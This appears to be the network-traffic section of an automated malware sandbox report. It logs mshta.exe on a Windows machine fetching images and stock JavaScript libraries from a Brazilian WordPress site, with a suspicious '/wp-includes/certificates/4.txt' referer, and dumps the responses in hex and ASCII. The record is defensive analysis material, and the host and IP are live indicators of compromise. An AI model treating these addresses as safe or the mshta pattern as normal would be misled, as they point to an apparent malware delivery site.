                                        Data Ascii: PNGIHDR9 IDATxy|T?;K&!$#K@nEeVl.iRk!\.(,!I!d~?fIf=wd&yW=3K~w$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$D"H$ho VlWe[@LJ*m3DpFb4Cc\{_D"H$Vz8{d)y_p@9Df01SlQ5`mD"H$CqTzLb0dP)2<L H$D!wWTi.8L<"5[H$DHpUQo%`@QPq9D{?D"HzJ=y2TD{?F ~U*H$D6|fm-.]4<PE bbBo$!w'&%n~{ZL"H$$]Z~\qj#L|GN6z9ojYcT6tIDINAnd{RG/MJ$D"tIqh`f`j|Yy6C2bd`_N:_b~(?7s;H$DRpd%N}uf~qex)[LM,f$D"8]^}#BNbUZ{.3++za,L(I<;bv-09H$D]yqp0RgAtg
                                        Aug 16, 2022 10:48:53.276933908 CEST1298OUTGET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:53.490875006 CEST1299INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:15 GMT
                                        Server: Apache
                                        ETag: "a508ae-2af-5c93d38583b98"
                                        Last-Modified: Tue, 10 Aug 2021 23:54:19 GMT
                                        Content-Length: 687
                                        Content-Type: image/png
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534577 21534520
                                        Age: 38
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 02 35 49 44 41 54 78 da a4 93 4b 48 54 61 18 86 9f ff 9c a3 73 9c 71 9c 46 87 69 6c 2a 24 45 85 49 a6 8c 88 dc b6 69 53 64 b4 ef b2 aa 2c a4 65 50 46 3b 77 81 8b 16 ad 82 68 57 b6 8a 88 10 91 86 26 cc 10 25 1a ac c6 b2 1a e7 e2 05 cd b9 9c cb 9c f3 b7 11 b5 cb 46 fc 36 df e2 fd 78 78 f9 78 5f 21 a5 64 27 23 80 5a a0 7e 7d 6f 67 2c a0 a8 01 81 b3 cf ee 14 fe 56 25 60 3a 0a 20 f0 28 0e 42 fc 4b 18 ee bd 1b d6 00 9f e3 3a c4 c3 ad 1b 82 2d 15 14 24 c7 23 cb 28 42 f2 26 d7 44 d5 15 d4 2a ee c6 cd 54 21 0d e0 d3 00 d5 76 1d d6 ac 32 8b 95 22 86 a3 d2 16 58 e3 cc be 3c 4d a6 00 09 91 e8 67 86 7f ee 26 b5 e4 a7 4e 73 68 aa ab c7 76 1d 00 55 03 30 6d 8b 42 b9 42 d1 2a d1 db 92 e5 74 74 89 a1 c7 3d 8c be db 03 55 49 77 57 96 9b 17 93 bc 6a 08 f2 24 dd 8c 23 55 4c db 02 40 03 28 1b 26 91 70 8e f3 b1 0f 74 45 f2 bc 48 9e 62 b6 12 e7 58 0f e4 97 4a 8c bc df 4f d0 3b cf ed fe 31 ba 77 7d e7 61 fa 20 b3 0b 5b 00 2d 9e 45 06 e2 53 34 e8 05 b0 55 ee 3f 2a 32 3a 91 c2 1f 74 69 8e 7a d9 db 11 e0 47 29 4c 75 25 43 67 e8 1b 03 fe 39 ae 2d c4 49 02 0a c0 64 41 e5 72 22 c6 e4 7c 23 e8 15 0e 75 64 70 ab 1e 4a e5 2a 5f 66 7e 31 fa 7c 85 c3 07 f2 68 81 32 1f 73 01 fa 12 31 92 59 6d d3 81 69 18 bc ce 35 90 c8 1e e1 6a ec 2b 57 ce bd 65 7a 26 c4 cb 64 1b a8 0a 27 8e 7e e2 64 f7 53 86 26 da b9 37 dd 8a 8d 8f 5a 63 75 13 60 19 06 5e c5 4b b9 2a 18 9c 6c 67 64 3e c4 8d fe 31 6e 5d 48 80 14 ac 06 2d ae a7 62 24 32 21 7c 35 55 7c 9a 4d d9 30 b6 38 b0 2c 74 24 ba a6 a2 6b 92 d4 72 88 be f1 46 2e 75 ce e1 a9 71 79 30 de 42 c5 56 09 d5 39 80 8a 8b c4 b4 36 9f 68 49 c7 65 25 9d fd 23 65 15 60 70 46 07 40 57 73 08 21 31 ff 13 67 01 04 80 28 e0 df 66 17 d6 80 8c 00 d4 f5 22 a9 db 04 38 80 25 76 5a e7 df 03 00 ff a6 e7 ee 3e 29 e0 82 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRapHYs cHRMz%u0`:o_F5IDATxKHTasqFil*$EIiSd,ePF;whW&%F6xxx_!d'#Z~}og,V%`: (BK:-$#(B&D*T!v2"X<Mg&NshvU0mBB*tt=UIwWj$#UL@(&ptEHbXJO;1w}a [-ES4U?*2:tizG)Lu%Cg9-IdAr"|#udpJ*_f~1|h2s1Ymi5j+Wez&d'~dS&7Zcu`^K*lgd>1n]H-b$2!|5U|M08,t$krF.uqy0BV96hIe%#e`pF@Ws!1g(f"8%vZ>)IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        24192.168.2.2249200187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:51.590778112 CEST1008OUTGET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:51.822079897 CEST1023INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:08 GMT
                                        Server: Apache
                                        ETag: "a51459-15f88-5c93d38d98e41"
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        Content-Length: 89992
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664480 17526318
                                        Age: 43
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 63 61 72 6f 75 73 65 6c 0a 20 2a 20 40 76 65 72 73 69 6f 6e 20 32 2e 33 2e 34 0a 20 2a 20 40 61 75 74 68 6f 72 20 42 61 72 74 6f 73 7a 20 57 6f 6a 63 69 65 63 68 6f 77 73 6b 69 0a 20 2a 20 40 61 75 74 68 6f 72 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 54 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 4d 49 54 29 0a 20 2a 20 40 74 6f 64 6f 20 4c 61 7a 79 20 4c 6f 61 64 20 49 63 6f 6e 0a 20 2a 20 40 74 6f 64 6f 20 70 72 65 76 65 6e 74 20 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 20 62 75 62 6c 69 6e 67 0a 20 2a 20 40 74 6f 64 6f 20 69 74 65 6d 73 53 63 61 6c 65 55 70 0a 20 2a 20 40 74 6f 64 6f 20 54 65 73 74 20 5a 65 70 74 6f 0a 20 2a 20 40 74 6f 64 6f 20 73 74 61 67 65 50 61 64 64 69 6e 67 20 63 61 6c 63 75 6c 61 74 65 20 77 72 6f 6e 67 20 61 63 74 69 76 65 20 63 6c 61 73 73 65 73 0a 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 24 2c 20 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 75 6e 64 65 66 69 6e 65 64 29 20 7b 0a 0a 09 2f 2a 2a 0a 09 20 2a 20 43 72 65 61 74 65 73 20 61 20 63 61 72 6f 75 73 65 6c 2e 0a 09 20 2a 20 40 63 6c 61 73 73 20 54 68 65 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 2e 0a 09 20 2a 20 40 70 75 62 6c 69 63 0a 09 20 2a 20 40 70 61 72 61 6d 20 7b 48 54 4d 4c 45 6c 65 6d 65 6e 74 7c 6a 51 75 65 72 79 7d 20 65 6c 65 6d 65 6e 74 20 2d 20 54 68 65 20 65 6c 65 6d 65 6e 74 20 74 6f 20 63 72 65 61 74 65 20 74 68 65 20 63 61 72 6f 75 73 65 6c 20 66 6f 72 2e 0a 09 20 2a 20 40 70 61 72 61 6d 20 7b 4f 62 6a 65 63 74 7d 20 5b 6f 70 74 69 6f 6e 73 5d 20 2d 20 54 68 65 20 6f 70 74 69 6f 6e 73 0a 09 20 2a 2f 0a 09 66 75 6e 63 74 69 6f 6e 20 4f 77 6c 28 65 6c 65 6d 65 6e 74 2c 20 6f 70 74 69 6f 6e 73 29 20 7b 0a 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 43 75 72 72 65 6e 74 20 73 65 74 74 69 6e 67 73 20 66 6f 72 20 74 68 65 20 63 61 72 6f 75 73 65 6c 2e 0a 09 09 20 2a 20 40 70 75 62 6c 69 63 0a 09 09 20 2a 2f 0a 09 09 74 68 69 73 2e 73 65 74 74 69 6e 67 73 20 3d 20 6e 75 6c 6c 3b 0a 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 43 75 72 72 65 6e 74 20 6f 70 74 69 6f 6e 73 20 73 65 74 20 62 79 20 74 68 65 20 63 61 6c 6c 65 72 20 69 6e 63 6c 75 64 69 6e 67 20 64 65 66 61 75 6c 74 73 2e 0a 09 09 20 2a 20 40 70 75 62 6c 69 63 0a 09 09 20 2a 2f 0a 09 09 74 68 69 73 2e 6f 70 74 69 6f 6e 73 20 3d 20 24 2e 65 78 74 65 6e 64 28 7b 7d 2c 20 4f 77
                                        Data Ascii: /** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE *//** * Owl carousel * @version 2.3.4 * @author Bartosz Wojciechowski * @author David Deutsch * @license The MIT License (MIT) * @todo Lazy Load Icon * @todo prevent animationend bubling * @todo itemsScaleUp * @todo Test Zepto * @todo stagePadding calculate wrong active classes */;(function($, window, document, undefined) {/** * Creates a carousel. * @class The Owl Carousel. * @public * @param {HTMLElement|jQuery} element - The element to create the carousel for. * @param {Object} [options] - The options */function Owl(element, options) {/** * Current settings for the carousel. * @public */this.settings = null;/** * Current options set by the caller including defaults. * @public */this.options = $.extend({}, Ow
                                        Aug 16, 2022 10:48:51.822124004 CEST1025INData Raw: 6c 2e 44 65 66 61 75 6c 74 73 2c 20 6f 70 74 69 6f 6e 73 29 3b 0a 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 50 6c 75 67 69 6e 20 65 6c 65 6d 65 6e 74 2e 0a 09 09 20 2a 20 40 70 75 62 6c 69 63 0a 09 09 20 2a 2f 0a 09 09 74 68 69 73 2e 24 65 6c 65 6d 65
                                        Data Ascii: l.Defaults, options);/** * Plugin element. * @public */this.$element = $(element);/** * Proxied event handlers. * @protected */this._handlers = {};/** * References to the running plugins of this carousel.
                                        Aug 16, 2022 10:48:51.822186947 CEST1026INData Raw: 63 74 65 64 0a 09 09 20 2a 2f 0a 09 09 74 68 69 73 2e 5f 69 6e 76 61 6c 69 64 61 74 65 64 20 3d 20 7b 7d 3b 0a 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 4f 72 64 65 72 65 64 20 6c 69 73 74 20 6f 66 20 77 6f 72 6b 65 72 73 20 66 6f 72 20 74 68 65 20 75
                                        Data Ascii: cted */this._invalidated = {};/** * Ordered list of workers for the update process. * @protected */this._pipe = [];/** * Current state information for the drag operation. * @todo #261 * @protected */thi
                                        Aug 16, 2022 10:48:51.822228909 CEST1027INData Raw: 74 72 75 65 2c 0a 09 09 70 75 6c 6c 44 72 61 67 3a 20 74 72 75 65 2c 0a 09 09 66 72 65 65 44 72 61 67 3a 20 66 61 6c 73 65 2c 0a 0a 09 09 6d 61 72 67 69 6e 3a 20 30 2c 0a 09 09 73 74 61 67 65 50 61 64 64 69 6e 67 3a 20 30 2c 0a 0a 09 09 6d 65 72
                                        Data Ascii: true,pullDrag: true,freeDrag: false,margin: 0,stagePadding: 0,merge: false,mergeFit: true,autoWidth: false,startPosition: 0,rtl: false,smartSpeed: 250,fluidSpeed: false,dragEndSpeed: false,responsive
                                        Aug 16, 2022 10:48:51.822268009 CEST1029INData Raw: 2c 20 27 73 65 74 74 69 6e 67 73 27 20 5d 2c 0a 09 09 72 75 6e 3a 20 66 75 6e 63 74 69 6f 6e 28 63 61 63 68 65 29 20 7b 0a 09 09 09 63 61 63 68 65 2e 63 75 72 72 65 6e 74 20 3d 20 74 68 69 73 2e 5f 69 74 65 6d 73 20 26 26 20 74 68 69 73 2e 5f 69
                                        Data Ascii: , 'settings' ],run: function(cache) {cache.current = this._items && this._items[this.relative(this._current)];}}, {filter: [ 'items', 'settings' ],run: function() {this.$stage.children('.cloned').remove();}}, {fil
                                        Aug 16, 2022 10:48:51.822309017 CEST1030INData Raw: 09 09 09 69 74 65 6d 73 20 3d 20 74 68 69 73 2e 5f 69 74 65 6d 73 2c 0a 09 09 09 09 73 65 74 74 69 6e 67 73 20 3d 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2c 0a 09 09 09 09 2f 2f 20 54 4f 44 4f 3a 20 53 68 6f 75 6c 64 20 62 65 20 63 6f 6d 70 75
                                        Data Ascii: items = this._items,settings = this.settings,// TODO: Should be computed from number of min width items in stageview = Math.max(settings.items * 2, 4),size = Math.ceil(items.length / 2) * 2,repeat = settings.loop &&
                                        Aug 16, 2022 10:48:51.822350979 CEST1032INData Raw: 6f 72 64 69 6e 61 74 65 73 20 3d 20 63 6f 6f 72 64 69 6e 61 74 65 73 3b 0a 09 09 7d 0a 09 7d 2c 20 7b 0a 09 09 66 69 6c 74 65 72 3a 20 5b 20 27 77 69 64 74 68 27 2c 20 27 69 74 65 6d 73 27 2c 20 27 73 65 74 74 69 6e 67 73 27 20 5d 2c 0a 09 09 72
                                        Data Ascii: ordinates = coordinates;}}, {filter: [ 'width', 'items', 'settings' ],run: function() {var padding = this.settings.stagePadding,coordinates = this._coordinates,css = {'width': Math.ceil(Math.abs(coordinates[coord
                                        Aug 16, 2022 10:48:51.822391033 CEST1033INData Raw: 5f 63 75 72 72 65 6e 74 29 29 3b 0a 09 09 7d 0a 09 7d 2c 20 7b 0a 09 09 66 69 6c 74 65 72 3a 20 5b 20 27 77 69 64 74 68 27 2c 20 27 70 6f 73 69 74 69 6f 6e 27 2c 20 27 69 74 65 6d 73 27 2c 20 27 73 65 74 74 69 6e 67 73 27 20 5d 2c 0a 09 09 72 75
                                        Data Ascii: _current));}}, {filter: [ 'width', 'position', 'items', 'settings' ],run: function() {var rtl = this.settings.rtl ? 1 : -1,padding = this.settings.stagePadding * 2,begin = this.coordinates(this.current()) + padding,
                                        Aug 16, 2022 10:48:51.822429895 CEST1035INData Raw: 27 20 2b 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 45 6c 65 6d 65 6e 74 20 2b 20 27 3e 27 2c 20 7b 0a 09 09 09 22 63 6c 61 73 73 22 3a 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 43 6c 61 73 73 0a 09 09 7d 29 2e
                                        Data Ascii: ' + this.settings.stageElement + '>', {"class": this.settings.stageClass}).wrap( $( '<div/>', {"class": this.settings.stageOuterClass}));// append stagethis.$element.append(this.$stage.parent());};/** * Create item
                                        Aug 16, 2022 10:48:51.822469950 CEST1036INData Raw: 6e 74 2e 66 69 6e 64 28 27 69 6d 67 27 29 3b 0a 09 09 09 6e 65 73 74 65 64 53 65 6c 65 63 74 6f 72 20 3d 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6e 65 73 74 65 64 49 74 65 6d 53 65 6c 65 63 74 6f 72 20 3f 20 27 2e 27 20 2b 20 74 68 69 73 2e
                                        Data Ascii: nt.find('img');nestedSelector = this.settings.nestedItemSelector ? '.' + this.settings.nestedItemSelector : undefined;width = this.$element.children(nestedSelector).width();if (imgs.length && width <= 0) {this.preloadAutoWidt
                                        Aug 16, 2022 10:48:52.053936958 CEST1066INData Raw: 09 09 69 66 20 28 62 72 65 61 6b 70 6f 69 6e 74 20 3c 3d 20 76 69 65 77 70 6f 72 74 20 26 26 20 62 72 65 61 6b 70 6f 69 6e 74 20 3e 20 6d 61 74 63 68 29 20 7b 0a 09 09 09 09 09 6d 61 74 63 68 20 3d 20 4e 75 6d 62 65 72 28 62 72 65 61 6b 70 6f 69
                                        Data Ascii: if (breakpoint <= viewport && breakpoint > match) {match = Number(breakpoint);}});settings = $.extend({}, this.options, overwrites[match]);if (typeof settings.stagePadding === 'function') {settings.stagePadding =
                                        Aug 16, 2022 10:48:52.290482044 CEST1174OUTGET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:52.525928020 CEST1180INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:49 GMT
                                        Server: Apache
                                        ETag: "a55e6f-27f7-58592be2ea280"
                                        Last-Modified: Tue, 02 Apr 2019 21:23:06 GMT
                                        Content-Length: 10231
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664481 15074171
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 09 53 57 46 4f 62 6a 65 63 74 20 76 32 2e 32 20 3c 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 73 77 66 6f 62 6a 65 63 74 2f 3e 20 0a 09 69 73 20 72 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 3c 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 3e 20 0a 2a 2f 0a 76 61 72 20 73 77 66 6f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 44 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 72 3d 22 6f 62 6a 65 63 74 22 2c 53 3d 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 2c 57 3d 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 2c 71 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 2c 52 3d 22 53 57 46 4f 62 6a 65 63 74 45 78 70 72 49 6e 73 74 22 2c 78 3d 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 4f 3d 77 69 6e 64 6f 77 2c 6a 3d 64 6f 63 75 6d 65 6e 74 2c 74 3d 6e 61 76 69 67 61 74 6f 72 2c 54 3d 66 61 6c 73 65 2c 55 3d 5b 68 5d 2c 6f 3d 5b 5d 2c 4e 3d 5b 5d 2c 49 3d 5b 5d 2c 6c 2c 51 2c 45 2c 42 2c 4a 3d 66 61 6c 73 65 2c 61 3d 66 61 6c 73 65 2c 6e 2c 47 2c 6d 3d 74 72 75 65 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 61 3d 74 79 70 65 6f 66 20 6a 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 21 3d 44 26 26 74 79 70 65 6f 66 20 6a 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 21 3d 44 26 26 74 79 70 65 6f 66 20 6a 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 21 3d 44 2c 61 68 3d 74 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 59 3d 74 2e 70 6c 61 74 66 6f 72 6d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 61 65 3d 59 3f 2f 77 69 6e 2f 2e 74 65 73 74 28 59 29 3a 2f 77 69 6e 2f 2e 74 65 73 74 28 61 68 29 2c 61 63 3d 59 3f 2f 6d 61 63 2f 2e 74 65 73 74 28 59 29 3a 2f 6d 61 63 2f 2e 74 65 73 74 28 61 68 29 2c 61 66 3d 2f 77 65 62 6b 69 74 2f 2e 74 65 73 74 28 61 68 29 3f 70 61 72 73 65 46 6c 6f 61 74 28 61 68 2e 72 65 70 6c 61 63 65 28 2f 5e 2e 2a 77 65 62 6b 69 74 5c 2f 28 5c 64 2b 28 5c 2e 5c 64 2b 29 3f 29 2e 2a 24 2f 2c 22 24 31 22 29 29 3a 66 61 6c 73 65 2c 58 3d 21 2b 22 5c 76 31 22 2c 61 67 3d 5b 30 2c 30 2c 30 5d 2c 61 62 3d 6e 75 6c 6c 3b 69 66 28 74 79 70 65 6f 66 20 74 2e 70 6c 75 67 69 6e 73 21 3d 44 26 26 74 79 70 65 6f 66 20 74 2e 70 6c 75 67 69 6e 73 5b 53 5d 3d 3d 72 29 7b 61 62 3d 74 2e 70 6c 75 67 69 6e 73 5b 53 5d 2e 64 65 73 63 72 69 70 74 69 6f 6e 3b 69 66 28 61 62 26 26 21 28 74 79 70 65 6f 66 20 74 2e 6d 69 6d 65 54 79 70 65 73 21 3d 44 26 26 74 2e 6d 69 6d 65 54 79 70 65 73 5b 71 5d 26 26 21 74 2e 6d 69 6d 65 54 79 70 65 73 5b 71 5d 2e 65 6e 61 62 6c 65 64 50 6c 75 67 69 6e 29 29 7b 54 3d 74 72 75 65 3b 58 3d 66 61 6c
                                        Data Ascii: /*SWFObject v2.2 <http://code.google.com/p/swfobject/> is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=fal
                                        Aug 16, 2022 10:48:52.548129082 CEST1190OUTGET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:52.789908886 CEST1200INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:49 GMT
                                        Server: Apache
                                        ETag: "a534bd-434-58592d488ae40"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:21 GMT
                                        Content-Length: 1076
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664483 15074175
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 2e 66 6e 2e 6a 66 6c 69 63 6b 72 66 65 65 64 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 65 29 7b 63 3d 62 2e 65 78 74 65 6e 64 28 21 30 2c 7b 66 6c 69 63 6b 72 62 61 73 65 3a 22 2f 2f 61 70 69 2e 66 6c 69 63 6b 72 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 66 65 65 64 73 2f 22 2c 66 65 65 64 61 70 69 3a 22 70 68 6f 74 6f 73 5f 70 75 62 6c 69 63 2e 67 6e 65 22 2c 6c 69 6d 69 74 3a 32 30 2c 71 73 74 72 69 6e 67 73 3a 7b 6c 61 6e 67 3a 22 65 6e 2d 75 73 22 2c 66 6f 72 6d 61 74 3a 22 6a 73 6f 6e 22 2c 6a 73 6f 6e 63 61 6c 6c 62 61 63 6b 3a 22 3f 22 7d 2c 63 6c 65 61 6e 44 65 73 63 72 69 70 74 69 6f 6e 3a 21 30 2c 75 73 65 54 65 6d 70 6c 61 74 65 3a 21 30 2c 69 74 65 6d 54 65 6d 70 6c 61 74 65 3a 22 22 2c 69 74 65 6d 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 2c 63 29 3b 76 61 72 20 64 3d 63 2e 66 6c 69 63 6b 72 62 61 73 65 2b 63 2e 66 65 65 64 61 70 69 2b 22 3f 22 2c 66 3d 21 30 2c 67 3b 66 6f 72 28 67 20 69 6e 20 63 2e 71 73 74 72 69 6e 67 73 29 66 7c 7c 28 64 2b 3d 22 26 22 29 2c 64 2b 3d 67 2b 22 3d 22 2b 63 2e 71 73 74 72 69 6e 67 73 5b 67 5d 2c 66 3d 21 31 3b 72 65 74 75 72 6e 20 62 28 74 68 69 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 67 3d 62 28 74 68 69 73 29 2c 66 3d 74 68 69 73 3b 62 2e 67 65 74 4a 53 4f 4e 28 64 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 62 2e 65 61 63 68 28 64 2e 69 74 65 6d 73 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 61 29 7b 69 66 28 64 3c 63 2e 6c 69 6d 69 74 29 7b 69 66 28 63 2e 63 6c 65 61 6e 44 65 73 63 72 69 70 74 69 6f 6e 29 7b 76 61 72 20 62 3d 0a 2f 3c 70 3e 28 2e 2a 3f 29 3c 5c 2f 70 3e 2f 67 2c 65 3d 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 3b 62 2e 74 65 73 74 28 65 29 26 26 28 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 3d 65 2e 6d 61 74 63 68 28 62 29 5b 32 5d 2c 76 6f 69 64 20 30 21 3d 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 26 26 28 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 3d 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 3c 70 3e 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 3c 2f 70 3e 22 2c 